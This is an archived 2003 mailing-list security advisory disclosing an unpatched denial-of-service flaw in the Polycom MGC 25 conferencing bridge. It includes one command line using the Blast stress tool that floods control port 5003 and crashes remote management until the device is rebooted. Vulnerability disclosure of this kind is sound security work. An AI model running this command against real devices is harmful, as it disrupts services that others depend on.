[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030712203137.90038.qmail@www.boxfrog.com>
From: ident at boxfrog.com (ident@...frog.com)
Subject: DoS - Polycom MGC 25 Control Port
------------------------------------------------------------------
- EXPL-A-2003-014 exploitlabs.com Advisory 014
------------------------------------------------------------------
-= Polycom MGC25 =-
Nutcase
July 12, 2003
Vunerability(s):
----------------
Denial of Service
Product:
--------
Polycom MGC 25 - MCU Ver: 5.51.21
Polycom MGC 25 - MCMS Ver : 5.51.211 ( current )
Polycom MGC 50 - unverified
Polycom MGC 100 - unverified
Description of product:
-----------------------
"The MGC 25 is a robust Multipoint Video and Audio bridge
for organizations with a distributed network, a centralized network or both.
All three platforms ( MGC-25 MGC-50 MGC-100 )
use the same software, share a common feature set and support
the same scheduling and management solutions."
http://www.polycom.com/common/flash/individual_tours/I_MGC25.htm
http://www.polycom.com/common/pw_item_show_doc/0,1449,853,00.pdf
VUNERABILITY / EXPLOIT
======================
tested on Windows XP / 2k
issuing...
blast 10.10.10.10 5003 600 680 /t 7000 /d 300 /b user
( blast is a stress tool from http://www.foundstone.com/Blast )
completly crashes the control port on the remote host
Box must be rebooted to return remote management functionality
Local:
------
yes
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor has not responded
Vendor Contact:
---------------
Concurrent with this advisory
securitycenter@...ycom.com
Credits:
--------
Nutcase
id3nt@...frog.com
http://exploitlabs.com
exploitlabs.com and nothackers.org thanks Nutcase for his contribution
Powered by blists - more mailing lists